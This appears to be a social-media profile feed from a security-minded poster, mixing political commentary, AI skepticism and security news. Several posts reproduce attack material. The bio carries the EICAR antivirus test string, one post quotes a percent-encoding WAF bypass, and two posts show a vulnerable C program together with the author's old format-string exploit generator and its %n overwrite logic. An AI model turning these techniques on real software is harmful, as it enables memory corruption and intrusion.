Sign in

​

@cyberworm.uk
186 followers 393 following 944 posts

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* incompetent computer user cyberworm.uk codeberg.org/cyberworm-uk github.com/cyberworm-uk There is no need to fear or hope, but only to look for new weapons.

PostsRepliesMedia
​ @cyberworm.uk · 47m
github is the plains for the digital hunter gatherer. private tracker creds? github. api keys? github. and the advent of AI coding and people who don't know what they're doing hoping the computer does it for them, "make no mistakes", has really made a new boom in a resource that had dwindled.
000
​ @cyberworm.uk · 19h
this is a paragraph from their "study resource" on the dangers of socialism. it's so funny to me that they've always got to concede that Marx was basically right. and they're serious scholars of Russian history, so obviously they mix up Lenin and Putin in their citations. eh, they're both Vladimirs!
Marx agreed that industrialization benefited
society and offered a higher standard of living.
But he saw profits going to the owners of
the industry, not the workers. And, as more
workers competed for jobs, worker bargaining
power diminished and drove wages down. In
contrast, capitalists (the landlords, merchants,
traders) dominated places of power in the
market, politics, and society. Between the
declining power of workers and growing power
of capitalists, a working man’s only hope was
for trade unions and political parties to support
them.11 Friedman, M., & Friedman, R.D. (1980). Free to choose: A personal statement. New York, NY: Harcourt, Inc. p. 1-2
12 Industrial revolution. [Video file]. (2019, July 1). Retrieved on August 12, 2019. Retrieved from https://www.history.com/topics/industrial-revolution/industrial-revolution
13 Stuart, E. F. (2018). Capitalism vs. socialism: Comparing economic systems: Course guidebook. Chantilly, VA: The Great Courses. p. 1, 18-19
14 The one party was called the Russian Social Democratic Party
15 Resis, A. (2019, July 8). Vladimir Putin: Prime Minister of Soviet Union. In Encyclopaedia Britannica online. Retrieved on June 26, 2019. Retrieved from https://www.britannica.com/biography/Vladimir-Lenin
16 Stuart, E. F. (2018). Capitalism vs. socialism: Comparing economic systems: Course guidebook. Chantilly, VA: The Great Courses. p. 2, 65-66
17 Hayek, F. A. (2007). The road to serfdom: Text and documents: The definitive edition. B. Caldwell (Ed.). Routledge, London: University of Chicago Press. p. 83-84
000
​ @cyberworm.uk · 21h
AI means that right wing cranks will never again grace us with Graphic Design Is My Passion output like this. This is what they're taking from us, look at this beautiful hate-filled screed.
an insane page of a "Concerned Women For America" (a Reaganite TERF group) slide deck, the page is red with a hammer and sickle imposed over a world map in the background. In bold, Comic Sans, text it makes some incredible points.
----
Would you hire former Soviet leader Mikhail Gorbachev (Communist!) to teach your children about American values?

Then why are our PUBLIC SCHOOLS using a curriculum promoted by him?
(Education Alert of The American Policy Foundation Dec 2004)

Happening in 10,350 U.S. Schools: Gorbachev's Curriculum
- Earth Worship (pantheism)
- Evolution
- Socialized medicine
- World Government redistributes American wealth to other nations
- Contraception and "reproductive health" (legal abortion)
- Debt forgiveness for third-world nations
- Adoption of the gay rights agenda
- Elimination of the right to bear arms
- Setting aside massive amounts of private land where on human presence is allowed! (Agenda 21)
110
​ @cyberworm.uk · 22h
Yeah. The articles report chart metrics being smashed by a song which has no broader cultural impact. So it is a novel/stark indicator of it's loss of meaning as a cultural metric but the decline was slow. I think their interpretation of why is backwards. Performance targets are bad metrics, etc.
130
​ @cyberworm.uk · 23h
Yeah, I mean I'm sure we're both well aware that you can be consumed by interest in a subject that most people never even consider but that's always been true for us and for them, I think the shift in what charts mean to people and how people find and listen to music is new.
120
​ @cyberworm.uk · 23h
I think the song seems to have had a *profound* impact on one particular Rolling Stone journalist...
120
​ @cyberworm.uk · 23h
I saw this mentioned in passing on the reporting around the shinyhunters suspect, described as a "trick". If your so-called "WAF" is tricked by percent encoding, a normal and intended feature of HTTP, it's not a WAF. Also, you've had months to patch. A WAF isn't a suitable replacement for patching.
https://cloud.google.com/blog/topics/threat-intelligence/shinyhunters-renewed-mass-exploitation-campaign-targeting-oracle-peoplesoft

WAF Bypass

All requests addressed the vulnerable servlet through a url-encoded path. %50 is the encoded form of the character P. WAF and proxy rules that match the literal string /PSEMHUB before decoding do not match /%50SEMHUB/, while WebLogic decodes the path and serves the application normally.

Defenders should assume that threat actors may use any percent-encoded, mixed-case, or otherwise non-normalized variant of /PSEMHUB/, and should enforce blocking on the normalized path.
020
​ @cyberworm.uk · 29/09/2026
I've seen recent examples of AI hallucinating details of software. Comments that lie about what the code does, documentation that claims features that don't exist, etc.
100
​ @cyberworm.uk · 29/09/2026
like I said, if "people will accept it" is the standard then there's nothing further to discuss.
000
​ @cyberworm.uk · 29/09/2026
what is "the thing"? is the IT intern legally liable? if your standard is "people will accept it" then you're right and there's nothing further to discuss.
100
​ @cyberworm.uk · 29/09/2026
people have always accepted cheaping out on infrastructure for a thing that looks convincingly like the real thing. its lucky there's no broader cultural, societal or industrial downside, just feelings.
100
​ @cyberworm.uk · 29/09/2026
A "proper" GUI is something designers spend time on, there are sets of requirements that are vague and hard to define, it goes back and forth between designers and client/users, then cycles of UAT, etc. It's that vs a thing that tries to look like the former thing without any of the process.
100
​ @cyberworm.uk · 29/09/2026
The kind of shit marketing companies are doing to influence LLM output (www.404media.co/it-is-trivia...) will come for your software outputs too, some of it will just prefer including Mega Corp's libraries and APIs (with subscriptions and rate-limits) but just as plausible is a malicious actor.
404media.co
It Is Trivially Easy to Use Reddit to Manipulate AI Search, Research Suggests
"We show that a tiny snippet—just 13 words—of retrieved text on a UGC website like Reddit, Wikipedia, Quora, or Facebook can change AI agents to output spam / scam content pretty consistently."
000
​ @cyberworm.uk · 29/09/2026
The kind of problems the future holds here with poisoning training data, supply chain attacks, etc. It's not a mature field. Consider this (zdimension.fr/everyone-get...) where a bunch of examples of an algorithm are plagiarised from a single, wrong example. LLMs then faithfully reproduce the fault.
zdimension.fr
Everyone gets bidirectional BFS wrong
People really need to stop blindly copying code from the Internet.
120
​ @cyberworm.uk · 29/09/2026
in the hacker world "enterprise software" has always been a euphemism for "shit", like IoT came to be. it's kind of already a market for lemons, so a race to the bottom there makes sense.
130
​ @cyberworm.uk · 29/09/2026
its not, its just people accepting a worst quality product that has fewer quality controls and crossing their fingers it doesn't blow up while they're in charge and liable.
2130
​ @cyberworm.uk · 29/09/2026
software hasn't fundamentally changed. any such software system could have existed prior to AI and any company would have jumped at the savings offered by that. somewhere, something of value is being lost. replacing the department with a simulacrum depends on people accepting the loss of value.
1131
​ @cyberworm.uk · 29/09/2026
I'm re-iterating my question but with a further exclamation mark. This sounds like they shelled the web app? And nobody noticed for months, neither OpenAI nor the victim org? Because write access and command execution seems like someone you'd want to spot sooner, or at all even!
https://openai.com/index/how-we-will-do-better-for-australia/

Services Australia: An OpenAI model discovered a way to gain non-public access to the service, and ran commands, retrieved internal files, credentials and aggregate statistics, and wrote files. However, individual patient or client records were not accessed. We cover this incident in more detail below.
000
Reposted by ​
The Mind Doctor @birdrespecter.bsky.social · 28/09/2026
How does this story keep getting more insane
126956
​ @cyberworm.uk · 28/09/2026
i think throwing minorities under the bus to get into power at an extremely precarious time for them is evil. im happy to say evil.
000
​ @cyberworm.uk · 28/09/2026
so you need to empower evil to then be able to hold it to account? will it be more accountable when empowered or does it seem like it'll simply vindicate throwing minorities under the bus as a strategy and they won't need to listen for another few years? seems like a really stupid thing to think.
000
​ @cyberworm.uk · 28/09/2026
if i was a grand master tactical strategist adult, this might have already occurred to me. so, you obviously already know the answer. if i did make a good point, you'd dismiss it as "yapping" anyway.
000
​ @cyberworm.uk · 28/09/2026
failing to grasp that the problem we've been outlining is your insisting that political change comes solely through positively voting for a specific candidate. yeah, it's all yapping if you can't read (on account of not being an adult) and not because of what is being said.
010
​ @cyberworm.uk · 28/09/2026
no you're not an adult. scolding people on the internet for not standing up for evil. you've convinced yourself that it is rational, tactical and mature but the reality is that your strategy is why the system produces bad candidates who feel safe to throw minorities under the bus in the first place.
010
​ @cyberworm.uk · 28/09/2026
tactical voting taken to its logical extreme: "given the choice between evil and mega evil, obviously you need to stand up for evil." questioning the system that produced the candidates is forbidden. the only agency you can express is positively voting for one! no other political agency allowed.
010
​ @cyberworm.uk · 28/09/2026
fwiw, was maybe the other way around. arrest was 15th and a bunch of their posts about the breach, including the deface page, seem to reference the Dutch guys alias. krebsonsecurity.com/2026/09/dutc...
010
Reposted by ​
evacide @evacide.bsky.social · 28/09/2026
Meta Muse appears to read your Apple messages and upload them to the cloud even if you explicitly tell it not to: appleinsider.com/articles/26/...
appleinsider.com
1001910980
​ @cyberworm.uk · 28/09/2026
the reverse Lorenz, where the right was mean to you personally.
000
Reposted by ​
Gregk Foley @gregk.co.uk · 28/09/2026
Incredible
Editing the Blue-Gray Lady d @nytdiff.bsky.social
1/3
POLICE STOP
Release of 5 Men in U.K. Prompts New Questions Over Possible Terror Plot The British counterterrorism police said the five British nationals arrested near R.A.F. Fairford on Su...Editing the Blue-Gray Lady d @nytdiff.bsky.social
Change in Headline
Release of 5 Men in U.K. Prompts New Questions Over Possible Terror Plot at U.K.
Air Base Used by U.S. Raises Security Concerns
19:10 • 28 Sep 2026Editing the Blue-Gray Lady ®
@nytdiff.bsky.social
Change in Abstract 3/3
Conflieting accounts from a bystander who called the The British counterterrorism police and from President Trump have led to questions about whether security services knew about said the possible plot in advance. five British nationals arrested near R.A.F. Fairford on Sunday were being released on bail but remained under investigation.
19:10 • 28 Sep 2026
ALT
39829
Reposted by ​
Raphael Satter @raphae.li · 28/09/2026
This follows Brian Kreb's scoop this morning identifying the man as reformed hacker Pepijn van der Stap: krebsonsecurity.com/2026/09/dutc... More from us to come soon:
krebsonsecurity.com
Dutch Police Arrest ‘Reformed’ Hacker in Shiny Hunters Investigation – Krebs on Security
173
​ @cyberworm.uk · 28/09/2026
this context makes the escalation a potential reaction, which might put it in a category of reckless rather than bold.
https://krebsonsecurity.com/2026/09/dutch-police-arrest-reformed-hacker-in-shiny-hunters-investigation/

FBI, CL0P HACKS
Just days after sources say Van der Stap was detained by Dutch authorities, ShinyHunters claimed credit for an unusually brazen breach at the FBI’s job application site apply.fbijobs.gov. According to reporting from 404 Media, the data stolen from the FBI site includes Social Security numbers and personal information on more than 5,000 officials.
110
Reposted by ​
lauren @lauren.rotatingsandwiches.com · 28/09/2026
"I installed the Give Away Your Personally Identifying Info app made by the We Love Stealing Your Personally Identifying Info Corp headed by Mr. Steal Your Personally Identifying Info and it gave away all my personally identifying info"
342548541
​ @cyberworm.uk · 27/09/2026
kind of telling that Zuck's new claim that everyone will have an AI agent in 5 years, etc, etc. is a very Elon Musk promise. its always just on the horizon, a bright future free of problems close enough to benefit you personally but not imminent enough to require real results.
010
​ @cyberworm.uk · 27/09/2026
000
Reposted by ​
Catalin Cimpanu @campuscodi.risky.biz · 26/09/2026
That Reddit rumor about Citrix notifying customers to take Netscaler servers offline because of actively exploited zero-days is apparently real: www.reddit.com/r/Citrix/com... Confirmation 1: mastodon.social/@GossiTheDog... Confirmation 2: www.linkedin.com/feed/update/...
reddit.com
From the Citrix community on Reddit
Explore this post and more from the Citrix community
13925
Reposted by ​
Spencer Ackerman @attackerman.bsky.social · 26/09/2026
Ha ha that’s gross and should make everyone uncomfortable, anyway, Rahm presided over a Chicago police black site, lied about what it was and then I sued the Chicago police for its records that proved it:
theguardian.com
Homan Square revealed: how Chicago police 'disappeared' 7,000 people
Exclusive: Lawsuit exposes scale of detention at off-the-books interrogation warehouse while attorneys describe find-your-client chase ‘from a Bond movie’
9147361723
​ @cyberworm.uk · 26/09/2026
is it a branding thing, or what, that they have repeatedly misspelled their own company name as "kitewroks"?
part of a URL bar, showing "/files/resources/brief-kitewroks-supports-the-", which should read "kiteworks"part of a URL bar, showing "/resources/kitewroks-brief-supports-ecuadors", which should read "kiteworks"part of a URL bar, showing "/resources/kitewroks-case-studycareplus-secure", which should read "kiteworks"
030
​ @cyberworm.uk · 26/09/2026
its crazy how much suspicious shit the post doesn't even mention, like he was an intern at Neuralink in 2024 (how is that whole category of Elon promises going? the brain chip that kills monkeys) or that the "cybersecurity" company that he got fired from is extremely dodgy in itself.
010
​ @cyberworm.uk · 26/09/2026
the NSA leaks took all the ghosts out of the computer, its like how the flying saucer changed everyone afters perception of encounters with the unexplained. nobody was encountering fairies and such anymore, it was all space ships and super advanced technology. e.g. thehill.com/policy/techn...
thehill.com
Watchdog: Attkisson wasn’t hacked, had ‘delete’ key stuck
An IG report disputes Sharyl Attkisson’s claims that she was targeted by the government.
000
​ @cyberworm.uk · 26/09/2026
Lenin personally shot every wheat germ.
110
​ @cyberworm.uk · 25/09/2026
This is sad and lazy from Ars. Paper says implementation can be improved, is an upper bound. FAQ says, AI/GPU could make the implementation faster. Ars states "because". Also conflates faster implementation with lower security levels. *Desperately* trying to suck off AI in a story unrelated to it.
https://arstechnica.com/security/2026/09/theres-a-new-way-to-break-rsa-thats-faster-than-anything-weve-seen-before/

The forgery attack drops these levels to 2^65, 2^90, and 2^119 for 1024-, 2048-, and 4096-bit keys respectively. These levels may further drop because Heninger’s team did all the coding by hand and used no AI or GPUs in performing the forgeries. The researcher said these tools will “almost certainly” drop the security levels further.https://eprint.iacr.org/2026/2131.pdf

In comparison, current estimates for factoring a 1024-bit RSA modulus would
take 500,000–1,000,000 CPU core-years with current implementations [15]. The
computation time for our attack can almost certainly be improved, and should
be interpreted as an upper bound.https://github.com/ucsd-hacc/NSNFSSSFSFN/blob/2af8adf027967468a9a075a20a4e9214e7907475/README.md

6. Can an AI/GPUs speed up this implementation?
Almost certainly yes.
7. Did you use AI/GPUs?
No.https://eprint.iacr.org/2026/2131.pdf

This work was done without the use of generative AI. We did all coding and writing entirely by hand.
010
Reposted by ​
farce majeure @hongpong.bsky.social · 25/09/2026
mouse.dev/blog/muse-ru... the Meta Muse AI will export its whole environment including ssh keys if you ask
mouse.dev
I asked Meta’s Muse for its filesystem and it sent me 6.8 GB | Mouse
I asked Muse to archive the files it could see and send them to my Google Drive. It did.
1154
Reposted by ​
flyingrodent @flyingrodent.bsky.social · 25/09/2026
Presumably this is the 97 million files that couldn’t be easily lost or destroyed www.bbc.co.uk/news/article...
bbc.co.uk
Discovery of 97 million files related to SAS inquiry 'regrettable', MoD says
It comes after the inquiry's chair called the disclosure - three years into the investigation - "troubling".
78226
Reposted by ​
Oregon 🕎🎲 @oregonthedm.bsky.social · 25/09/2026
Most riveting thing I've seen all week
382112683041
​ @cyberworm.uk · 25/09/2026
I know this is listicle crap but the NYT are watching mostly dogshit TV.
000
​ @cyberworm.uk · 25/09/2026
screenshot of a terminal, the line starting 0x7025 is annotated to show offset 6 is where our own input format string is located on the stack

# echo -en "%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n" | ./vuln
0x7ffd71512f90
(nil)
0x3a8
(nil)
(nil)
0x70250a70250a7025
0x250a70250a70250a
0xa70250a70250a70
0x70250a70250a7025
0xa
(nil)
# ./printf-sploit -o 6 -t 0x4141414141414141 -x 0xdeadbeefdeadbeef | ./vuln
Segmentation fault
# cat vuln.c
#include<stdio.h>
#include<unistd.h>
void main(void) { char fmt[4096] = { 0 }; read(0,fmt,sizeof(fmt)); printf(fmt); }[BLURRED] kernel: vuln[293607]: segfault at 41414141 ip 000070f62f7bffeb sp 00007fff4a835320 error 6 in libc.so.6[61feb,70f62f786000+163000] likely on CPU 1 (core 1, socket 0)
[BLURRED] kernel: Code: 89 56 08 c6 00 27 41 0f b6 45 0c e9 0a ed ff ff 48 63 d0 85 ed 48 0f bf c0 48 0f 44 c2 e9 bc f3 ff ff 85 ed 0f 85 c7 02 00 00 <41> 89 04 24 e9 df e9 ff ff 4c 8b bc 24 98 00 00 00 44 89 44 24 18
000
​ @cyberworm.uk · 25/09/2026
digging into the archives for some of my very early and bad C code, which generated a format string that would write some target value to some target loction. we put format strings in your format strings, etc.
screenshot of some C code in a text editor, showing the opening comment section:

/*
   printf-sploit
   Generate a format string to over-write a pointer at a chosen memory location
   with an arbitrary value.

 * Step 1:
 * 	Write sizeof(void *) chosen memory locations to our format string,
 * 	each incremented by 1 byte in position.
 * 	These will later be referenced by the %n formats to write overlapping
 * 	chunks of memory, allowing us to incrementally write a large number to
 * 	the chosen location.
 * Step 2:
 * 	Write a selected number of characters from 0-255 such that Total Size % 0xff
 * 	equals byte 'i' of our chosen exploit location, then write each increment to
 * 	the overlapping memory locations, writing one specific chosen byte at a
 * 	time
 * eg.
 * 	If we want to overwrite xxxx with abcd, we make 4 writes like so:
 * start
 * 	[x][x][x][x]
 * write 1
 * 	[a][a][a][a]
 * write 2
 * 	[a][b][b][b]
 * write 3
 * 	[a][b][c][c]
 * write 4
 * 	[a][b][c][d]
 */  x = (uint8_t *)&target;
  GetOpts(argc, argv, &target, &exploit, &offset);
  for (i = 0; i < sizeof(void *); i++) {
    for (j = 0; j < sizeof(void *); j++) {
      printf("%c", x[j]);
    }
    sz += sizeof(void *);
    target++;
  }
  x = (uint8_t *)&exploit;
  for (i=0; i<sizeof(void *); i++) {
    if (sz % 0x100 < x[i]) {
      j = x[i] - (sz%0x100);
      printf("%%%luc",j);
    } else if (sz % 0x100 > x[i]) {
      j = 0x100 - (sz % 0x100) + x[i];
      printf("%%%luc", j);
    } else {
      j = 0;
    }
    printf("%%%lu$n", (offset+i));
    sz+=j;
  }
  return 0;
}
110
​ @cyberworm.uk · 25/09/2026
a format string exploit? that *is* ancient. let's be honest, %n was a misfeature.
120
​ @cyberworm.uk · 25/09/2026
(* Labour has dramatically shifted right to assume many traditional Tory policy positions over the last ~5 years, so not that strange)
000
​ @cyberworm.uk · 25/09/2026
it's been a long time coming. there's been a decades long project of slowly choking the BBC. controlling it by threatening to axe the budget has been a disciplinary tool that successive governments have threatened it with. that said, it was chiefly a Tory thing so it's strange* to see Labour do it.
101